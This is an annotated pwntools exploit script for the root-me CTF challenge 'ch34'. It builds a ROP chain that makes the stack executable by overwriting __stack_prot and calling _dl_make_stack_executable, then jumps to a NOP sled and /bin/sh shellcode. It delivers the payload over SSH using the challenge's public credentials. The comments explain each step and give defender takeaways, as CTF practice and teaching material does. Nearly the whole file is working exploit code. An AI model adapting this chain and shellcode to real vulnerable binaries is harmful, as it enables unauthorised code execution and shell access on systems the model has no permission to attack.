# Proof-of-concept for root-me challenge "ch34" (pwntools, Python 2 era).
#
# Technique shown: a ROP chain that defeats a non-executable stack (NX) by
# re-protecting the stack RWX through glibc's own loader machinery, then
# jumps to shellcode placed on that stack. The chain is built from gadgets
# looked up directly in the target ELF, so it relies on fixed addresses —
# presumably a statically linked, non-PIE binary (not visible here; confirm
# with `checksec`). Defender takeaway: NX alone is insufficient when the
# binary exposes a writable `__stack_prot` and `_dl_make_stack_executable`;
# PIE/ASLR and a stack canary would each break the fixed-offset overwrite
# this chain depends on.
from pwn import *

# All gadget assembly below is x86-64.
context.arch = "amd64"
elf = ELF("ch34")
rop = ROP(elf)

# Step 1: rcx <- 7. 7 == PROT_READ|PROT_WRITE|PROT_EXEC (mmap prot bits);
# this is the protection value the stack will be remapped with.
rop.raw(next(elf.search(asm('pop rcx; ret;'))))
rop.raw(7)

# Step 2: rdx <- &__stack_prot, the global glibc consults when it decides
# how to (re)protect the stack.
rop.raw(next(elf.search(asm('pop rdx; ret;'))))
rop.raw(elf.symbols['__stack_prot'])

# Step 3: *__stack_prot = 7 via an arbitrary-write gadget.
rop.raw(next(elf.search(asm('mov [rdx], rcx; ret;'))))

# Step 4: _dl_make_stack_executable(&__libc_stack_end) — glibc applies the
# value stored in __stack_prot to the stack mapping, making it executable.
rop.call('_dl_make_stack_executable', [elf.symbols['__libc_stack_end']])

# Step 5: transfer control to the stack, where the NOP sled + shellcode
# (appended in `payload` below) now sit.
rop.raw(next(elf.search(asm('call rsp'))))

# Human-readable view of the chain, useful when debugging gadget lookups.
print(rop.dump())

# 280 bytes of filler reach the saved return address (offset is challenge-
# specific and not derivable from this script), then the chain, a 128-byte
# NOP sled, and a stock /bin/sh shellcode.
# NOTE(review): this is Python 2 string handling — under Python 3 asm() and
# str(rop) yield bytes and the `+` with str literals raises TypeError.
payload = "A"*280 + str(rop) + "\x90"*128 + asm(shellcraft.sh())

# Challenge access: the credentials are the public per-challenge ones
# published by root-me; they are hard-coded here rather than read from the
# environment.
s = ssh(host='challenge03.root-me.org', port=2223, user='app-systeme-ch34', password='app-systeme-ch34')
# Run the target on the remote box, deliver the payload on stdin, then hand
# the session to the user.
p = s.process(['./ch34'])
p.sendline(payload)
p.interactive()